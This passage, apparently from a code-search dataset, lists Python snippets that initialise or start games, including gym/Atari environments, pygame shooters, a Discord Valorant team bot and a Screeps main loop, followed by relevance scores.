self.frameskip = frameskip\n self.ale = ALEInterface()\n self.viewer = None\n\n # Tune (or disable) ALE's action repeat:\n # https://github.com/openai/gym/issues/349\n assert isinstance(repeat_action_probability, (float, int)), \"Invalid repeat_action_probability: {!r}\".format(repeat_action_probability)\n self.ale.setFloat('repeat_action_probability'.encode('utf-8'), repeat_action_probability)\n\n self._seed()\n\n (screen_width, screen_height) = self.ale.getScreenDims()\n self._buffer = np.empty((screen_height, screen_width, 3), dtype=np.uint8)\n\n self._action_set = self.ale.getMinimalActionSet()\n self.action_space = spaces.Discrete(len(self._action_set))\n\n (screen_width,screen_height) = self.ale.getScreenDims()\n if self._obs_type == 'ram':\n self.observation_space = spaces.Box(low=np.zeros(128), high=np.zeros(128)+255)\n elif self._obs_type == 'image':\n self.observation_space = spaces.Box(low=0, high=255, shape=(screen_height, screen_width, 3))\n else:\n raise error.Error('Unrecognized observation type: {}'.format(self._obs_type))", "def play_game(self):\n # need everyone to pass to move to next phase?\n self.deal_cards()\n self.plant_food()", "async def new_game(self, players): \r\n if len(players) != 10:\r\n return discord.Embed(title=\"Valorant 10 Man Bot\",\r\n description=\"You cannot start a game with only {} players\".format(len(players)))\r\n self.teams = {\"A\": [], \"B\" : []}\r\n self.previous_captains = self.captains\r\n self.captains = {\"A\" : None, \"B\" : None}\r\n self.nick_to_player = {get_member_name(p) : p for p in players}\r\n self.previous_players = self.remaining\r\n self.remaining = players.copy()\r\n self.turn = 1\r\n self.order = []\r\n self.map_dict = {k : True for k in self.map_dict.keys()}\r\n return discord.Embed(title=\"Valorant 10 Man Bot\",\r\n description=\"New game started\".format(len(players)))", "def new_game(cls, x_user, o_user, game_moves):\n game = Game(x_user=x_user,\n o_user=o_user,\n game_moves=game_moves,\n moves_count=0,\n game_over=False)\n game.put()\n usergame = UserGame(user=x_user, \n game_key=game.key,\n moves_count=0,\n game_over=False)\n usergame.put()\n usergame = UserGame(user=o_user, \n game_key=game.key,\n moves_count=0,\n game_over=False)\n usergame.put()\n return game", "def init_gym_pygame(game_name):\n # OpenAI gym setup \n game_name = 'gvgai-aliens-lvl0-v0'\n env = gym.make(game_name)\n env.reset()\n \n # pygame setup\n pg.init()\n height = env.observation_space.shape[0]\n width = env.observation_space.shape[1]\n screen = pg.display.set_mode((width, height))\n\n return env, screen", "def setUp(self):\r\n global ship_image\r\n self.spaceshipgame = SpaceShipGame()\r\n self.spaceshipgame.init()\r\n pos = [1,1]\r\n vel = [1,1]\r\n angle = 0\r\n image = ship_image\r\n\r\n center = [1,1]\r\n size = 1\r\n info = ImageInfo(center, size)\r\n\r\n self.ship = Ship( pos, vel, angle, image, info)", "def setUp(self):\r\n global ship_image\r\n self.spaceshipgame = SpaceShipGame()\r\n self.spaceshipgame.init()\r\n pos = [1,1]\r\n vel = [1,1]\r\n angle = 0\r\n image = ship_image\r\n\r\n center = [1,1]\r\n size = 1\r\n info = ImageInfo(center, size)\r\n\r\n self.ship = Ship( pos, vel, angle, image, info)", "def main():\n # parse arguments from the command line (argparse validates arguments)\n args = _get_args()\n # build the environment with the given ID\n env = gym.make(args.env)\n # play the environment with the given mode\n if args.mode == 'human':\n play_human(env)\n else:\n play_random(env, args.steps)", "def new_game(self):\n\n 
self.board = {}", "def run_gui_game():\n # Set up game\n view = GuiView()\n game = GameEngine(view)", "def __init__(self, size, block_positions, starts, player_1, player_2, \n terminal_viz, print_game_in_terminal, \n time_to_make_a_move=2, game_time=100, \n penalty_score=300, max_fruit_score=300, max_fruit_time=15):\n\n # check that each Player implements the following methods:\n self.players = [player_1, player_2]\n for player in self.players:\n assert hasattr(player, 'set_game_params')\n assert hasattr(player, 'make_move')\n assert hasattr(player, 'set_rival_move')\n assert hasattr(player, 'update_fruits')\n\n self.print_game_in_terminal = print_game_in_terminal\n self.terminal_viz = terminal_viz\n self.time_to_make_a_move = time_to_make_a_move\n self.penalty_score = penalty_score\n self.some_player_cant_move = False\n \n \n self.game_time_left_for_players = [game_time, game_time]\n\n initial_board = self.set_initial_board(size, block_positions, starts)\n\n self.game = Game(initial_board, starts, max_fruit_score=max_fruit_score, max_fruit_time=max_fruit_time, \n animated=True, animation_func=self.animate_func)\n\n for i, player in enumerate(self.players):\n player.set_game_params(self.game.get_map_for_player_i(player_id=i))", "def __init__(self):\n\n self.width = 10\n self.height = 10\n self.new_game()", "def spawn_players(self) -> None:\n # Initialise the players\n self.player1 = Player(self.sensitivity, self.screen_width, self.screen_height, self.screen_width // 2, 50,\n self.player_lives, self.fps, self.player1_bullet, Direction.DOWN, self.debug)\n self.player2 = Player(self.sensitivity, self.screen_width, self.screen_height, self.screen_width // 2,\n self.screen_height - 50, self.player_lives, self.fps, self.player2_bullet, Direction.UP,\n self.debug)\n\n # Rotate the image of the player at the top\n self.player1.rotate(180)", "def init(seed=None):\n\tglobal _game\n\n\tfrom .game import Game\n\tfrom .prompt import install_words\n\n\t_game = Game(seed)\n\tload_advent_dat(_game)\n\tinstall_words(_game)\n\t_game.start()\n\treturn _game", "def main():\n g = DemoGame(800, 600)\n g.start()", "def main(self):\n _age = info.getInfo(self)\n _flag = game.check_age(self, _age)\n if _flag == False:\n exit()\n game.wants_to_play(0)", "def main():\n\n containerTextStyle = {\n 'color': '#ffffff',\n 'font': '10px',\n 'stroke': '#000000',\n 'strokeWidth': .15\n }\n spawnerRole = Spawner()\n # Clean up memory\n for creepName in Object.keys(Memory.creeps):\n if not Game.creeps[creepName]:\n if Memory.creeps[creepName].role == \"remoteHarvester\":\n print(\"Cleaning up remoteHarvester. 
It mined: \" + Memory.creeps[creepName].totalHarvested)\n del Memory.creeps[creepName]\n #print(\"Clearing non-existent creep memory: \" + creepName)\n\n if Game.cpu.bucket == 10000:\n Game.cpu.generatePixel()\n # Run each creep\n for name in Object.keys(Game.creeps):\n creep = Game.creeps[name]\n if creep.memory.role in Spawner.roles:\n Spawner.roles[creep.memory.role].run(creep)\n else:\n creep.say(\"No role\")\n\n # Run tower code\n homeRoom = Object.values(Game.spawns)[0].room\n towers = [struct for room in Object.values(Game.rooms) for struct in room.find(FIND_STRUCTURES) if struct.structureType == STRUCTURE_TOWER]\n hostiles = homeRoom.find(FIND_HOSTILE_CREEPS)\n for tower in towers:\n structures = sorted([struct for struct in tower.room.find(FIND_STRUCTURES) if struct.hits < struct.hitsMax], key=lambda struct: struct.hits)\n if len(hostiles) > 0:\n tower.attack(tower.pos.findClosestByPath(hostiles))\n continue\n\n for structure in structures:\n if structure.hits < structure.hitsMax and structure.hits < 100000:\n tower.repair(structure)\n break\n\n # Run visuals\n for room in Object.values(Game.rooms):\n for container in [struct for struct in room.find(FIND_STRUCTURES) if struct.structureType == STRUCTURE_CONTAINER or struct.structureType == STRUCTURE_STORAGE]:\n room.visual.text(Spawner.roles['harvester'].getStructureFutureEnergy(container), container.pos, containerTextStyle)\n\n # Run each spawn\n for name in Object.keys(Game.spawns)[0:1]:\n spawn = Game.spawns[name]\n spawnerRole.run(spawn)", "def __init__(self, affinity, game_type, game_space, opponent=None):\n \n super().__init__(affinity, game_type, game_space, opponent)", "def __init__(self):\n self.screen = pg.display.get_surface()\n self.screen_rect = self.screen.get_rect()\n self.clock = pg.time.Clock()\n self.fps = 60\n self.keys = pg.key.get_pressed()\n self.done = False\n # ship = random.choice(list(prepare.GFX[\"ships\"].values()))\n ship = list(prepare.GFX[\"ships\"].values())[7] # pick first ship available\n self.player = actors.Player((0, 0), ship)\n self.level = level.Level(self.screen_rect.copy(), self.player)\n\n self.energyloss_counter = 0\n self.energygain_counter = 0", "def start_game(self):\n while self.can_deal:\n self.take_turn()", "def __init__(self):\n pygame.init()\n self.settings = Settings()\n self.screen = pygame.display.set_mode(\n (self.settings.screen_width, self.settings.screen_height)\n )\n pygame.display.set_caption(\"Sideways Shooter\")\n self.stats = GameStats(self)\n self.sideways_ship = SidewaysShip(self)\n self.bullets = pygame.sprite.Group()\n self.aliens = pygame.sprite.Group()\n self._create_fleet()", "def test_valid_new_game(self):\n self._game.new_game()\n self.assertIsRUNNING(self._game)\n self.assertIsNotNone(self._game.table)\n self.assertEqual(self._game.table.player_turn, 1,\n \"Game.table unsuccessful init.\")", "def start_game(self):\n self.master.destroy()\n Game()", "def do_start_hosted(self):\n\t\tself.game_name = self.e_gamename.text\n\t\tself.num_players = (1, int(self.e_players.text))\n\t\tself.boardsize = (int(self.e_boardw.text), int(self.e_boardh.text))\n\n\t\td = {\"state\": be.S_GAME,\n\t\t\t\t\"hosting\": True,\n\t\t\t\t\"uuid\": None,\n\t\t\t\t\"name\": self.game_name,\n\t\t\t\t\"nickname\": self.nickname,\n\t\t\t\t\"num_players\": self.num_players,\n\t\t\t\t\"boardsize\": self.boardsize}\n\t\tevent = pygame.event.Event(be.E_STATE, d)\n\t\tpygame.event.post(event)\n\n\t\tself.hide_all()\n\t\tself.renderer.color = (0, 0, 0, 0)", "def __init__(self, game):\n self.rooms 
= self.load_rooms(f\"data/{game}Rooms.txt\")\n self.current_room = self.rooms[1]\n # use self.over to determine if the game if over\n self.over = 0\n self.load_items(f\"data/{game}Items.txt\")\n self.inventory = Inventory()\n # synonyms\n self.synonyms = {}\n self.load_synonyms(\"data/SmallSynonyms.txt\")", "def run():\n\n # Set up environment and agent\n e = Environment() # create environment (also adds some dummy traffic)\n a = e.create_agent(LearningAgent) # create agent\n e.set_primary_agent(a, enforce_deadline= True ) # set agent to track\n\n # Now simulate it\n sim = Simulator(e, update_delay=0.5) # reduce update_delay to speed up simulation\n sim.run(n_trials=100) # press Esc or close pygame window to quit", "async def game(self):\n pass" ]
[ "0.6907318", "0.68599695", "0.6728783", "0.66609395", "0.6579913", "0.6554996", "0.6510835", "0.64591074", "0.64184606", "0.6393087", "0.63915473", "0.6364802", "0.6364802", "0.6364802", "0.6364802", "0.6364802", "0.6359255", "0.635703", "0.63438934", "0.6340655", "0.63222647", "0.6230765", "0.62276447", "0.6192554", "0.6190398", "0.6188919", "0.6171213", "0.61516774", "0.6145663", "0.61230963", "0.6119365", "0.61087525", "0.6093325", "0.6091152", "0.60795623", "0.60722554", "0.604758", "0.60286254", "0.60186446", "0.60133606", "0.599565", "0.5957436", "0.59409904", "0.5925056", "0.59159774", "0.59091014", "0.59082234", "0.58997315", "0.58959615", "0.5890325", "0.5882927", "0.5879657", "0.5875502", "0.5875101", "0.5868611", "0.5862463", "0.5858779", "0.5856393", "0.5846861", "0.58307624", "0.5821008", "0.5820403", "0.5797097", "0.57960445", "0.5791845", "0.5788365", "0.57852113", "0.5783713", "0.5774389", "0.5774075", "0.57694566", "0.57627225", "0.5761301", "0.57539374", "0.575246", "0.5750212", "0.5749559", "0.5748215", "0.574666", "0.574538", "0.574538", "0.5742934", "0.5740808", "0.57402307", "0.5739559", "0.5737764", "0.57328993", "0.5730632", "0.57301444", "0.57223696", "0.57221764", "0.57182056", "0.57131535", "0.5711716", "0.57010895", "0.5698529", "0.569274", "0.56916517", "0.56894803", "0.5688346", "0.56879526" ]
0.0
-1
load the network from saved.h5
def load_network(self):
    self.dqn.load_network(self.path)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def load_network(self, which_epoch):\n save_filename = '%s_net.pth' % which_epoch\n load_path = os.path.join(self.save_dir, save_filename)\n net = self.net\n if isinstance(net, torch.nn.DataParallel):\n net = net.module\n print('loading the model from %s' % load_path)\n # PyTorch newer than 0.4 (e.g., built from\n # GitHub source), you can remove str() on self.device\n state_dict = torch.load(load_path, map_location=str(self.device))\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n net.load_state_dict(state_dict)", "def load_model(self):\n self.pred_net.load((self.save_path / \"iqn_pred_net\").absolute().as_posix())\n self.target_net.load((self.save_path / \"iqn_target_net\").absolute().as_posix())", "def load_trained_net(mal):\n model_root = os.path.join(os.getcwd(), 'data', 'models')\n model = load_model(os.path.join(model_root, 'model_' + mal + '.h5'))\n\n return model", "def load_network(self, sess, filename):\n dir_path = os.path.dirname(os.path.realpath(__file__))\n dir_path += '/Models/'\n dir_path += filename\n saver = tf.train.Saver()\n saver.restore(sess, dir_path)", "def load_network(fpath):\n\twith open(fpath, \"rb\") as f:\n\t\tnetwork = pickle.load(f)\n\treturn network", "def __load_Model(self):\r\n PrintsForUser.printProcess(\"[INFO] Loading network...\")\r\n \r\n self.__model = load_model(self.__model_path)\r\n self.__lb = pickle.loads(open(self.__labels_path, \"rb\").read())", "def load_networks(self, which_epoch):\n for name in self.model_names:\n if isinstance(name, str):\n filename = '%s_net_%s.pth' % (which_epoch, name)\n path = os.path.join(self.save_dir, filename)\n net = getattr(self, 'net_' + name)\n try:\n state_dict = torch.load(path)\n state_dict = {name.replace('module.', '', 1) : param for name, param in state_dict.items()}\n # net.load_state_dict(torch.load(path))\n net.load_state_dict(state_dict)\n except:\n pretrained_dict = torch.load(path)\n model_dict = net.state_dict()\n try:\n pretrained_dict = {k:v for k,v in pretrained_dict.items() if k in model_dict}\n net.load_state_dict(pretrained_dict)\n print('Pretrained network %s has excessive layers; Only loading layers that are used' % name)\n except:\n print('Pretrained network %s has fewer layers; The following are not initialized:' % name)\n not_initialized = set()\n for k, v in pretrained_dict.items():\n if v.size() == model_dict[k].size():\n model_dict[k] = v\n\n for k, v in model_dict.items():\n if k not in pretrained_dict or v.size() != pretrained_dict[k].size():\n not_initialized.add(k.split('.')[0])\n print(sorted(not_initialized))\n net.load_state_dict(model_dict)\n if len(self.gpu_ids) > 0 and torch.cuda.is_available():\n net.cuda()\n if not self.isTrain:\n net.eval()", "def load_networks(self, epoch):\n for name in self.network_names:\n if isinstance(name, str):\n load_filename = '{0}_net_{1}.pth'.format(epoch, name)\n load_path = os.path.join(self.save_dir, load_filename)\n net = getattr(self, 'net')\n if isinstance(net, torch.nn.DataParallel):\n net = net.module\n print('loading the model from {0}'.format(load_path))\n state_dict = torch.load(load_path, map_location=self.device)\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n\n net.load_state_dict(state_dict)", "def _load_model(self):\n self._load_scaler('scaler.save')\n self._load_encoder('encoder0.save', 0)\n self._load_encoder('encoder1.save', 1)\n self._load_neural_network('model.json', 'model.h5')\n return", "def load(uDir):\n import sys\n sys.path.append(uDir)\n from net_spec import spec\n \n 
builder = NetworkBuilder(spec)\n htm = builder.build()\n htm.start()\n \n ## restore each node state\n layers = htm.layers\n \n for l in range(len(layers) - 1):\n (r,c) = spec[l]['shape']\n\n if layers[l].node_sharing:\n state = {}\n state['coincidences'] = np.load(uDir + str(l) + \".0.0.coincidences.npy\")\n state['temporal_groups'] = [] ## !FIXME temporal groups should be saved, first\n state['PCG'] = np.load(uDir + str(l) + \".0.0.PCG.npy\")\n\n for i in range(r):\n for j in range(c):\n layers[l].pipes[i][j].send((\"set_state\", state))\n\n else:\n for i in range(r):\n for j in range(c):\n state = {}\n state['coincidences'] = np.load(uDir + str(l) + \".\" + str(i) + \".\" + str(j) + \".coincidences.npy\")\n state['temporal_groups'] = [] ## !FIXME temporal groups should be saved, first\n state['PCG'] = np.load(uDir + str(l) + \".\" + str(i) + \".\" + str(j) + \".PCG.npy\")\n layers[l].pipes[i][j].send((\"set_state\", state))\n \n ## restore also last node's state\n state = {}\n state['coincidences'] = np.load(uDir + str(len(layers) - 1) + \".0.0.coincidences.npy\")\n state['cls_prior_prob'] = np.load(uDir + str(len(layers) - 1) + \".0.0.cls_prior_prob.npy\")\n state['PCW'] = np.load(uDir + str(len(layers) - 1) + \".0.0.PCW.npy\")\n layers[-1].pipes[0][0].send((\"set_state\", state))\n\n return htm", "def load(self, filename, path=\".\"):\n if filename is None:\n if self.verbose:\n print(\"Neural Network Model Class - Save Function: No file name\")\n return -1\n\n #trn_params\n self.trn_params = NeuralNetworkParams()\n self.trn_params.load('%s_trn_params.pickle'%(filename),path=path)\n\n #model\n json_file = open(\"%s/%s_model.json\"%(path,filename), 'r')\n loaded_model_json = json_file.read()\n json_file.close()\n loaded_model = model_from_json(loaded_model_json)\n loaded_model.load_weights(\"%s/%s_model.h5\"%(path,filename))\n self.model = loaded_model\n self.trained = True\n #trn_desc\n self.trn_desc = None\n self.trn_desc = pickle.load(open(\"%s/%s_trn_desc.pickle\"%(path,filename), \"rb\"))", "def load_all(self, file):\n self.model = load_model(file + \"_model.h5\")", "def _load_local_weights(self, h5file):\n for name, layer in self._layers_to_save.items():\n self._load_layer_weights(layer, name, h5file)", "def load_hdf5_with_structure(file):\n n_classes = 80\n n_boxes = 5\n anchors = [[0.738768, 0.874946], [2.42204, 2.65704], [4.30971, 7.04493], [10.246, 4.59428], [12.6868, 11.8741]]\n\n yolov2 = YOLOv2(n_classes=n_classes, n_boxes=n_boxes)\n chainer.serializers.load_hdf5(file, yolov2)\n model = YOLOv2Predictor(yolov2)\n model.init_anchor(anchors)\n #model.predictor.train = False\n model.predictor.finetune = False\n return model", "def load(self, uri):\r\n self._encoder = load_model(uri+\"_lstm_encoder.hdf5\")\r\n self._autoencoder = load_model(uri+\"_lstm_autoencoder.hdf5\")\r\n\r\n pf = PyFolder(os.path.dirname(os.path.realpath(uri)))\r\n dict_options = pf[os.path.basename(uri)+\"_options.json\"]\r\n\r\n self._latent_space = dict_options['latent_space']\r\n self._input_cells = dict_options['input_cells']", "def load(self, filename):\n hebbian_weights = open(filename, \"r\").read().split('\\n')\n for i in xrange(self.hidden):\n weights = hebbian_weights[i].split('\\t')\n self.vis_layer[i].set_weights(weights)\n for i in xrange(self.layers):\n for j in xrange(self.hidden):\n weights = hebbian_weights[((i+1)*self.hidden)+j].split('\\t')\n self.hidden_layers[i][j].set_weights(weights)\n weights = hebbian_weights[-2].split('\\t')\n self.output_neuron.set_weights(weights)", "def 
load_networks(self, epoch):\n for name in self.model_names:\n if isinstance(name, str):\n load_filename = '%s_net_%s.pth' % (epoch, name)\n load_path = os.path.join(self.save_dir, load_filename)\n net = getattr(self, 'net' + name)\n if isinstance(net, torch.nn.DataParallel):\n net = net.module\n print('loading the model from %s' % load_path)\n # if you are using PyTorch newer than 0.4 (e.g., built from\n # GitHub source), you can remove str() on self.device\n state_dict = torch.load(load_path, map_location=str(self.device))\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n\n # patch InstanceNorm checkpoints prior to 0.4\n for key in list(state_dict.keys()): # need to copy keys here because we mutate in loop\n self.__patch_instance_norm_state_dict(state_dict, net, key.split('.'))\n net.load_state_dict(state_dict)", "def restore_model(self, path):\n # if cuda is not available load everything to cpu\n if not self.use_cuda:\n state = torch.load(path, map_location=lambda storage, loc: storage)\n else:\n state = torch.load(path)\n self.net.load_state_dict(state['state_dict'])\n self.optimizer.load_state_dict(state['optimizer'])\n self.epoch_counter = state['epoch'] # counts number of epochs", "def load_model(self, path):\n self._saver.restore(self._sess, path + '/model.ckp')\n pkl_file = open(path + '/som.pkl', 'rb')\n restored = pickle.load(pkl_file)\n pkl_file.close()\n self._m = restored['_m']\n self._n = restored['_n']\n self._neighbourhood = restored['_neighbourhood']\n # self._topography = restored['_topography']\n self._num_iterations = restored['_num_iterations']\n self._Wts = restored['_Wts']\n self._locations = restored['_locations']\n self._learned = restored['_learned']\n self._centroid_grid = restored['_centroid_grid']\n self.abnormal_dist = restored['abnormal_dist']\n\n print(\"Model restored from path: \" + path)", "def load(self, path):\n print('Loading model from {}'.format(path.name))\n self.qnetwork_local.load_state_dict(torch.load(path))\n self.qnetwork_target.load_state_dict(torch.load(path))\n return", "def load(self, path, nr_of_saves, test_it=-1):\n with self.graph.as_default():\n print(\"Loading networks...\")\n checkpoint_dir = os.path.join(os.environ['APPROXIMATOR_HOME'], path, \"network-\"+str(test_it))\n self.saver = tf.train.Saver(max_to_keep=nr_of_saves+1)\n try:\n self.saver.restore(self.sess, checkpoint_dir)\n print(\"Loaded: {}\".format(checkpoint_dir))\n except Exception:\n if test_it <= 0:\n # Initialize the variables\n self.sess.run(tf.global_variables_initializer())\n print(\"Failed! 
Initializing the network variables...\")\n else:\n raise", "def model_load(file_name=None):\n if file_name is None :\n file_name = \"./data/_oP5_SegmentClassifier.dump\"\n else:\n pass\n\n return p5_util.object_load(file_name)", "def load_networks(self, epoch: int) -> None:\n for name, module in self.modules.items():\n if isinstance(name, str):\n load_filename = '%s_net_%s.pth' % (epoch, name)\n load_path = os.path.join(self.save_dir, load_filename)\n if isinstance(module, torch.nn.DataParallel):\n module = module.module\n print('loading the model from %s' % load_path)\n state_dict = torch.load(load_path, map_location=str(self.device))\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n # patch InstanceNorm checkpoints prior to 0.4\n for key in list(state_dict.keys()): # need to copy keys here because we mutate in loop\n self.__patch_instance_norm_state_dict(state_dict, module, key.split('.'))\n module.load_state_dict(state_dict)\n return", "def load_model_from_checkpoint(self, path: str):\n ckpt = torch.load(path, map_location='cpu')\n self.net_q.encoder.load_state_dict(ckpt['encoder'])\n self.net_q.head.load_state_dict(ckpt['head'])\n self.net_ps.load_state_dict(ckpt['net_ps'])\n self.net_k.load_state_dict(ckpt['net_k'])\n self.queue.load_state_dict(ckpt['queue'])\n self.optimizer.load_state_dict(ckpt['optimizer'])\n if 'scheduler' in ckpt:\n self.scheduler.load_stae_dict(ckpt['scheduler'])\n self.move_optimizer_states(self.optimizer, self.local_rank)", "def load(self, name, path=None):\n if path is None:\n path = '.'\n if path[0] == '~':\n path = os.getenv(\"HOME\") + path[1:]\n\n try:\n with open(path + '/' + name, 'rb') as f:\n return pickle.load(f)\n except IOError as e:\n msg = str(e) + '\\nNeuralNetwork.load failed.'\n raise DNNetIOError(msg)", "def loadh5(fname, path='/data'):\n fp = open_read(fname)\n slab = fp.get_node(path)\n mat = slab.read()\n fp.close()\n return mat", "def load_network_for_training(file_name):\n global training_set, start_round, start_digit\n try:\n with open (file_name, 'r') as f:\n w = np.load(f)\n w_min = np.load(f)\n w_max = np.load(f)\n a_plus = np.load(f)\n a_minus = np.load(f)\n b_plus = np.load(f)\n b_minus = np.load(f)\n v_th = np.load(f)\n training_set = np.reshape(np.load(f), (TRAINING_SIZE, N))\n start_round = np.load(f)\n start_digit = np.load(f)\n\n Output.set_states({'v_th' : v_th})\n S.set_states({\n 'w' : w,\n 'w_min' : w_min, \n 'w_max' : w_max, \n 'a_plus' : a_plus, \n 'a_minus' : a_minus, \n 'b_plus' : b_plus, \n 'b_minus' : b_minus\n })\n print start_round\n print start_digit\n print v_th\n except IOError as e:\n print \"error opening file: %s\" % e.strerror\n sys.exit()", "def load_bytes_subnetwork_pretrained_weights(self, model):\n print(\"ToImplement\")", "def export_to_hdf5(cls, h5_file, model, loads):\n #encoding = model._encoding\n #comments = []\n sid = []\n node = []\n cid = []\n mag = []\n xyz = []\n for load in loads:\n #comments.append(loads.comment)\n sid.append(load.sid)\n node.append(load.node)\n cid.append(load.cid)\n mag.append(load.mag)\n xyz.append(load.xyz)\n\n #h5_file.create_dataset('_comment', data=comments)\n h5_file.create_dataset('sid', data=sid)\n h5_file.create_dataset('node', data=node)\n h5_file.create_dataset('cid', data=cid)\n h5_file.create_dataset('mag', data=mag)\n h5_file.create_dataset('xyz', data=xyz)", "def load(self, name=\"\"):\n\n self.constructed = True\n if name == \"\":\n name = \"/home/unai/Escritorio/MultiNetwork/model/model\"\n\n network_descriptors = {\"Generic\": 
GenericDescriptor, \"Decoder\": DecoderDescriptor, \"Discrete\": DiscreteDescriptor, \"Convolution\": ConvolutionDescriptor}\n\n if not os.path.isfile(name):\n print(\"Error at loading the model\")\n return None\n\n f = open(name, \"r+\")\n\n lines = f.readlines()\n\n i = 0\n while lines[i] != \"\\n\": # Each component is stored in a line\n ident, n_inp, kind, n_hidden, layers, init, act, cond_rand, taking, producing, depth, reachable, belows = lines[i][:-1].split(\"_\")\n kwargs = {}\n if int(ident[1:]) > self.last_net:\n self.last_net = int(ident[1:])\n\n self.reachable[ident] = reachable.split(\",\")\n self.comps_below[ident] = belows.split(\",\")\n\n if \"onv\" in kind: # Not working right now\n filters, sizes, layers, strides = layers.split(\"*\")\n sizes = sizes.split(\",\")\n s = np.array([[int(sz) for sz in szs.split(\"/\")] for szs in sizes])\n desc = network_descriptors[kind](int(inp), int(outp), int(n_inp), layers.split(\",\"), filters.split(\",\"), [int(x) for x in strides.split(\",\")], s, [int(x) for x in act.split(\",\")], [int(x) for x in init.split(\",\")], kwargs)\n else:\n if len(kwargs) > 0: # Not working right now\n kwargs = kwargs.split(\"-\")\n kwargs[0] = [int(x) for x in kwargs[0].split(\".\") if len(x) > 0]\n kwargs[1] = [int(x) for x in kwargs[1].split(\".\") if len(x) > 0]\n if len(cond_rand) > 0:\n cond_rand = cond_rand.split(\"-\")\n cond_rand[0] = [int(x) for x in cond_rand[0].split(\",\") if len(x) > 0]\n cond_rand[1] = [int(x) for x in cond_rand[1].split(\",\") if len(x) > 0]\n kwargs[\"conds\"] = cond_rand\n desc = network_descriptors[kind](int(taking.split(\",\")[0]), int(producing.split(\",\")[0]), int(n_inp), int(n_hidden), [int(x) for x in layers.split(\",\") if x != \"-1\"], init_functions[[int(x) for x in init.split(\",\") if x != \"-1\"]],\n act_functions[[int(x) for x in act.split(\",\") if x != \"-1\"]], **kwargs)\n\n # print(\"ident\", ident, \"n_inp\", n_inp, \"kind\", kind, \"inp\", inp, \"outp\", outp, \"layers\", layers, \"init\", init, \"act\", act, \"taking\", taking, \"producing\", producing, \"depth\", depth, \"kwargs\", kwargs)\n net = NetworkComp(desc, InOut(size=int(taking.split(\",\")[0]), data_type=taking.split(\",\")[1]), InOut(data_type=producing.split(\",\")[1], size=int(producing.split(\",\")[0])), int(depth))\n\n self.add_net(net, ident)\n i += 1\n\n i += 1\n\n while lines[i] != \"\\n\": # Inputs\n\n ident, size, kind, depth = lines[i].split(\"_\")\n\n self.inputs[ident] = ModelComponent(None, InOut(size=int(size), data_type=kind), int(depth))\n i += 1\n\n i += 1\n\n while lines[i] != \"\\n\": # Outputs\n\n ident, size, kind, depth, belows = lines[i].split(\"_\")\n\n self.outputs[ident] = ModelComponent(InOut(size=int(size), data_type=kind), None, int(depth))\n self.comps_below[ident] = belows.split(\",\")\n i += 1\n\n i += 1\n\n while i < len(lines): # Connections\n name, inp, outp, kind, size = lines[i].split(\"_\")\n\n if int(name[1:]) > self.last_con:\n self.last_con = int(name[1:])\n\n self.connections[name] = Connection(inp, outp, InOut(kind, int(size)), name)\n i += 1\n self.update_below()", "def load(self, name, hidden=False):\n\n prefix = \"\"\n if hidden:\n prefix = \".\"\n load = np.load(prefix + name + \".npy\", encoding=\"latin1\", allow_pickle=True)\n self.neurons = load[0]\n self.weights = load[1]\n\n if not self.silent:\n print(\"[NoxmainNetwork]: Network \\\"\" + str(name) + \"\\\" with neurons \" + str(self.neurons) + \" loaded!\")", "def load(self):\n\n or_none = lambda x: x if x != \"none\" else None\n with 
h5py.File(self.filename, \"r\") as hf:\n for attr, val in hf.attrs.items():\n setattr(self, attr, or_none(val))", "def test_hdf5_load_all():\n skip_if_no_h5py()\n import h5py\n\n # save random data to HDF5\n handle, filename = tempfile.mkstemp()\n dataset = random_one_hot_dense_design_matrix(np.random.RandomState(1),\n num_examples=10, dim=5,\n num_classes=3)\n with h5py.File(filename, 'w') as f:\n f.create_dataset('X', data=dataset.get_design_matrix())\n f.create_dataset('y', data=dataset.get_targets())\n\n # instantiate Train object\n trainer = yaml_parse.load(load_all_yaml % {'filename': filename})\n trainer.main_loop()\n\n # cleanup\n os.remove(filename)", "def load_model(self, fname: str) -> None:\n checkpoint_data = torch.load(fname)\n\n # Load the models\n # P-Net\n model_import_path = checkpoint_data['p_net']['model_import_path']\n imp = importlib.import_module(model_import_path)\n mod = getattr(imp, checkpoint_data['p_net']['model_name'])\n self.p_net = mod()\n self.p_net.set_params(checkpoint_data['p_net'])\n # Q-Net\n model_import_path = checkpoint_data['q_net']['model_import_path']\n imp = importlib.import_module(model_import_path)\n mod = getattr(imp, checkpoint_data['q_net']['model_name'])\n self.q_net = mod()\n self.q_net.set_params(checkpoint_data['q_net'])", "def import_network(file_name, NetworkClass):\r\n file = open(file_name, 'br')\r\n data_pickle = file.read()\r\n file.close()\r\n net = NetworkClass()\r\n net.__dict__ = pickle.loads(data_pickle)\r\n return net", "def load_model(self, name: str):\n\n # Loading config\n self.cM = ConfigManager(name + \".cfg\")\n\n # Loading Vocabs\n out_voc = pickle.load(open(name + \".out_voc\", \"rb\"))\n in_voc = pickle.load(open(name + \".in_voc\", \"rb\"))\n\n self.output_field.vocab = out_voc\n self.input_field.vocab = in_voc\n\n num_classes = len(self.output_field.vocab)\n embed = nn.Embedding.from_pretrained(self.input_field.vocab.vectors)\n self.network = FrameIDNetwork(self.cM, embed, num_classes)\n\n self.network.load_model(name + \".ph\")", "def load_checkpoint(self, label):\n model_dir = os.path.join(\n config.results_dir, config.experiment_name, 'checkpoints')\n model_file = os.path.join(model_dir, '{}_net.pth.tar'.format(label))\n\n print(\"Loading model from {}\".format(model_file))\n model_dict = torch.load(model_file)\n\n self.use_cuda = model_dict['use_cuda']\n if self.use_cuda:\n self.net.cuda()\n\n self.net.load_state_dict(model_dict['net_state_dict'])", "def save_utility_network(self,path_save):\n print(\"Save the neural network to : \"+path_save)\n self.nn.save_on_file(path_save)", "def load_model(path):\n if os.path.isfile(path):\n print(\"=> loading checkpoint '{}'\".format(path))\n checkpoint = torch.load(path)\n\n # # size of the top layer\n # N = checkpoint['state_dict']['top_layer.bias'].size()\n #\n # # build skeleton of the model\n # sob = 'sobel.0.weight' in checkpoint['state_dict'].keys()\n # model = models.__dict__[checkpoint['arch']](sobel=sob, out=int(N[0]))\n #\n # # deal with a dataparallel table\n # def rename_key(key):\n # if not 'module' in key:\n # return key\n # return ''.join(key.split('.module'))\n #\n # checkpoint['state_dict'] = {rename_key(key): val\n # for 